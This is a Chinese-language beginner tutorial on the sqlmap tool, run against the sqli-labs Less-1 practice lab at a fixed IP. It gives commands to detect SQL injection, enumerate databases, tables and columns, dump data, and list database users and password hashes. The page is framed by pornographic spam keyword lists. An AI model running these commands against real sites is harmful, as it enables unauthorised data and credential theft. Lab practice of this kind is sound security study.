色综合图-色综合图片-色综合图片二区150p-色综合图区-玖玖国产精品视频-玖玖香蕉视频

您的位置:首頁技術文章
文章詳情頁

SQL注入之sqlmap入門學習

瀏覽:5日期:2023-05-02 10:03:12
目錄
  • 一、判斷是否存在注入點
  • 二、查詢當前用戶下所有數據庫
  • 三、獲取數據庫中的表名
  • 四、獲取表中的字段名
  • 五、獲取字段內容
  • 六、獲取數據庫的所有用戶
  • 七、獲取數據庫用戶的密碼
  • 八、獲取當前網站數據庫的名稱
  • 九、獲取當前網站數據庫的用戶名稱

原來sql注入如此簡單

以SQL注入靶場sqli-labs第一關為例,進行sqlmap工具的使用分享。

一、判斷是否存在注入點

使用命令:

使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"

有圖中白色背景的 則判斷出有注入點

二、查詢當前用戶下所有數據庫

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs

可以看到有五個表

三、獲取數據庫中的表名

選取一個challenges數據庫,獲取此庫的表名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables  

四、獲取表中的字段名

選取表T5M0QG6FM2,獲取其中字段名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

五、獲取字段內容

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

六、獲取數據庫的所有用戶

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users

使用該命令就可以列出所有管理用戶

七、獲取數據庫用戶的密碼

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords

八、獲取當前網站數據庫的名稱

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

可以看到當前的數據庫是 security

九、獲取當前網站數據庫的用戶名稱

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user

當前用戶是root

到此這篇關于SQL注入之sqlmap入門學習的文章就介紹到這了,更多相關sqlmap入門內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: MsSQL
主站蜘蛛池模板: 免费国产高清精品一区在线 | 成人做爰视频www视频 | 日韩高清免费观看 | 久久久久久一品道精品免费看 | 玖玖精品在线视频 | 国产伦精品一区二区三区 | 蜜臀91精品国产高清在线观看 | 成年人黄页 | 亚洲精品亚洲一区二区 | 韩国美女毛片 | 亚洲图片在线视频 | 色视频在线免费 | 99视频国产在线 | 国内免费自拍视频 | 香港a毛片免费全部播放 | 亚洲成人在线视频 | 九九九九热精品免费视频 | 三级午夜三级三点在看 | a毛片免费播放全部完整 | 国产婷婷一区二区三区 | 久久院线 | 中日韩精品视频在线观看 | 99在线在线视频免费视频观看 | 亚洲午夜国产精品 | 午夜宅宅宅影院在线观看 | 久爱www免费人成福利播放 | 久久精品国产精品亚洲20 | 精品国产自在现线看久久 | 亚洲日本高清 | 国产大陆亚洲精品国产 | 国产精品毛片va一区二区三区 | 国产午夜在线观看视频播放 | 综合亚洲精品一区二区三区 | 日本三级毛片 | 国产精品日本欧美一区二区 | 全国最大色成免费网站 | 97精品福利视频在线 | 成人影院免费看 | 精品欧美高清不卡在线 | 亚洲综合久久久久久888 | 国产精品久久久久久久免费大片 |